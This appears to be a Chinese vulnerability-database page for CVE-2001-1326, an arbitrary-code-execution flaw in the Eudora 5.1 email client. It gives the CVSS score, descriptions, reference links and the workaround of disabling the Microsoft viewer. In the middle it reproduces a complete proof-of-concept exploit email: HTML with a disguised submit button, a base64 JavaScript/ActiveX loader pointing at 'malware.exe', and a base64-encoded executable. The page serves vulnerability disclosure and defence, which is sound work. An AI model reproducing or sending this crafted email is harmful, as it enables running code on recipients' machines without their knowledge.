CVE-2001-1326
CVSS7.5
发布时间 :2001-05-29 00:00:00
修订时间 :2008-09-05 16:26:15
NMCOES    

[原文]Eudora 5.1 allows remote attackers to execute arbitrary code when the "Use Microsoft Viewer" option is enabled and the "allow executables in HTML content" option is disabled, via an HTML email with a form that is activated from an image that the attacker spoofs as a link, which causes the user to execute the form and access embedded attachments.


[CNNVD]Qualcomm Eudora 隐藏附件执行漏洞(CNNVD-200105-104)

        CVE(CAN) ID: CAN-2001-1326
        
        
        
        Eudora是基于Windows平台的email客户端软件,它存在一个漏洞,如果'Use Microsoft viewer'选
        
        项是打开的,即使'allow executables in HTML content'选项被禁止了,攻击者也可能在远程主机
        
        上执行任意代码。
        
        
        
        攻击者通过精心构造一封包含一个伪造的提交按钮和两个附件的电子邮件(其中两个附件分别是可
        
        执行程序,JavaScript和ActiveX脚本),当用户点击伪造的提交按钮时,JavaScript和ActiveX脚
        
        本在Internet Explorer中打开执行,从而执行了我们的可执行程序。
        
        
        
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1326
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1326
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-104
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2796
(VENDOR_ADVISORY)  BID  2796
http://www.securityfocus.com/archive/1/187128
(VENDOR_ADVISORY)  BUGTRAQ  20010528 feeble.hey!dora.exploit part.II

- 漏洞信息

Qualcomm Eudora 隐藏附件执行漏洞
高危 未知
2001-05-29 00:00:00 2005-10-20 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-1326
        
        
        
        Eudora是基于Windows平台的email客户端软件,它存在一个漏洞,如果'Use Microsoft viewer'选
        
        项是打开的,即使'allow executables in HTML content'选项被禁止了,攻击者也可能在远程主机
        
        上执行任意代码。
        
        
        
        攻击者通过精心构造一封包含一个伪造的提交按钮和两个附件的电子邮件(其中两个附件分别是可
        
        执行程序,JavaScript和ActiveX脚本),当用户点击伪造的提交按钮时,JavaScript和ActiveX脚
        
        本在Internet Explorer中打开执行,从而执行了我们的可执行程序。
        
        
        
        

- 公告与补丁

        
        
        禁止'Use Microsoft Viewer'选项
        
        
        
        厂商补丁:
        
        
        
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
        
        的主页以获取最新版本:
        
        
        http://www.eudora.com/

        
        
        

- 漏洞信息 (20888)

Qualcomm Eudora 5.1 Hidden Attachment Execution Vulnerability (EDBID:20888)
windows remote
2001-05-29 Verified
0 http-equiv
N/A [点击下载]
source: http://www.securityfocus.com/bid/2796/info

Eudora is an email program for the Windows platform. Eudora contains a vulnerability which may make it possible for an attacker to excecute arbitrary code on a remote system even if 'allow executables in HTML content' is disabled, if the 'Use Microsoft viewer' option is enabled.

The attack can be carried out if the recipient of a maliciously crafted email 'submits' a form in the message.

This may lead to remote attackers gaining access to victim hosts.

** Eudora 5.1.1 is also stated as being vulnerable to this issue. The problem stems from Eudora not treating files with a '.MHTML' extension with caution. 

MIME-Version: 1.0
To: 
Subject: HEY!DORA
Content-Type: multipart/related;
 boundary="------------DB87F71CA55F5A135BFD6F03"


--------------DB87F71CA55F5A135BFD6F03
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
 <font color=#400040>To view the demo, please go here:</font><FORM action="cid:master.malware.com" method=post target=new><button  type=submit style="width:130pt;height:20pt;cursor:hand;background-color:transparent;border:0pt"><font color=#0000ff><u>http://www.malware.com</u></font></button> </FORM>
<img SRC="cid:master.malware.com" height=1 width=1><img SRC="cid:http://www.malware.com" height=1 width=1></html>

--------------DB87F71CA55F5A135BFD6F03
Content-Type: application/octet-stream; charset=iso-8859-1
Content-ID: <master.malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.html"

PGNlbnRlcj48Yj48Zm9udCAgY29sb3I9IiMwMDAwMDAiIGZhY2U9ImFyaWFsIj4gIDxoMT5t
YWx3YXJlLmNvbTwvaDE+PC9mb250PjwvYj48L2NlbnRlcj4NCg0KDQo8c2NyaXB0Pg0KLy8g
aHR0cDovL3d3dy5tYWx3YXJlLmNvbSAtIDE4LjAzLjAxDQpkb2N1bWVudC53cml0ZWxuKCc8
SUZSQU1FIElEPXJ1bm5lcndpbiBXSURUSD0wIEhFSUdIVD0wIFNSQz0iYWJvdXQ6Ymxhbmsi
PjwvSUZSQU1FPicpOw0KZnVuY3Rpb24gbGlua2l0KGZpbGVuYW1lKQ0Kew0KICAgc3RycGFn
ZXN0YXJ0ID0gIjxIVE1MPjxIRUFEPjwvSEVBRD48Qk9EWT48T0JKRUNUICAgQ0xBU1NJRD0i
ICsNCiAgICAgICInQ0xTSUQ6MTU1ODlGQTEtQzQ1Ni0xMUNFLUJGMDEtMDBBQTAwNTU1OTVB
JyBDT0RFQkFTRT0nIjsNCiAgIHN0cnBhZ2VlbmQgPSAiJz48L09CSkVDVD48L0JPRFk+PC9I
VE1MPiI7DQogICBydW5uZXJ3aW4uZG9jdW1lbnQub3BlbigpOw0KICAgcnVubmVyd2luLmRv
Y3VtZW50LndyaXRlKHN0cnBhZ2VzdGFydCArIGZpbGVuYW1lICsgc3RycGFnZWVuZCk7DQog
fQ0KbGlua2l0KCdtYWx3YXJlLmV4ZScpOw0KPC9zY3JpcHQ+
--------------DB87F71CA55F5A135BFD6F03
Content-Type: application/octet-stream
Content-ID: <http://www.malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.exe"

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
AAARAAASAAATAAAUAAAVAAAWAAAXAAAYAAAZAAAaAAAbAAAcAAAdAAAeAAAfAAAgAAAhAAAi
AAAjAAAkAAAlAAAmAAAnAAAoAAApAAAqAAArAAAsAAAtAAAuAAAvAAAwAAAxAAAyAAAzAAA0
AAA1AAA2AAA3AAA4AAA5AAA6AAA7AAA8AAA9AAA+AAA/AAA/AAA/AAA/AQA/AgA/AwA/BAA/
BQA/BgA/BwA/CAA/CQA/CgA/CwA/DAA/DQA/DgA/DwA/EAA/EQA/EgA/EwA/FAA/FQA/FgA/
FwA/GAA/GQA/GgA/GwA/HAA/HQA/HgA/HwA/IAA/IQA/IgA/IwA/JAA/JQA/JgA/JwA/KAA/
KQA/KgA/KwA/LAA/LQA/LgA/LwA/MAA/MQA/MgA/MwA/NAA/NQA/NgA/NwA/OAA/OQA/OgA/
OwA/PAA/PQA/PgA/PwA/PwA/PwA/PwE/PwI/PwM/PwQ/PwU/PwY/Pwc/Pwg/Pwk/Pwo/Pws/
Pww/Pw0/Pw4/Pw8/PxA/PxE/PxI/PxM/PxQ/PxU/PxY/Pxc/Pxg/Pxk/Pxo/Pxs/Pxw/Px0/
Px4/Px8/PyA/PyE/PyI/PyM/PyQ/PyU/PyY/Pyc/Pyg/Pyk/Pyo/Pys/Pyw/Py0/Py4/Py8/
PzA/PzE/PzI/PzM/PzQ/PzU/PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=
--------------DB87F71CA55F5A135BFD6F03--

		

- 漏洞信息

8344
Eudora Attachment Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Eudora contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when the 'Use Microsoft Viewer' option is enabled and the 'allow executables in HTML content' option is disabled. It is possible that the flaw may allow a remote attacker to create a specially crafted HTML email with a form that is activated from an image that the attacker spoofs as a link, which causes the user to execute the arbitrary code embedded in the attachment resulting in a loss of integrity.

- 时间线

2001-05-29 Unknow
2001-05-28 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Disable the 'Use Microsoft viewer' option.

- 相关参考

- 漏洞作者

- 漏洞信息

Qualcomm Eudora Hidden Attachment Execution Vulnerability
Unknown 2796
Yes No
2001-05-29 12:00:00 2009-07-11 06:06:00
Discovered and posted to Bugtraq by http-equiv@excite.com <http-equiv@excite.com> on May 29, 2001.

- 受影响的程序版本

Qualcomm Eudora 5.1.1
Qualcomm Eudora 5.1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- 漏洞讨论

Eudora is an email program for the Windows platform. Eudora contains a vulnerability which may make it possible for an attacker to excecute arbitrary code on a remote system even if 'allow executables in HTML content' is disabled, if the 'Use Microsoft viewer' option is enabled.

The attack can be carried out if the recipient of a maliciously crafted email 'submits' a form in the message.

This may lead to remote attackers gaining access to victim hosts.

** Eudora 5.1.1 is also stated as being vulnerable to this issue. The problem stems from Eudora not treating files with a '.MHTML' extension with caution.

- 漏洞利用

A proof of concept email, containing a form with a 'disguised' submit button as well as two attachments has been created by http-equiv@excite.com. This email will exploit this vulnerability and execute a program on a victim system.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站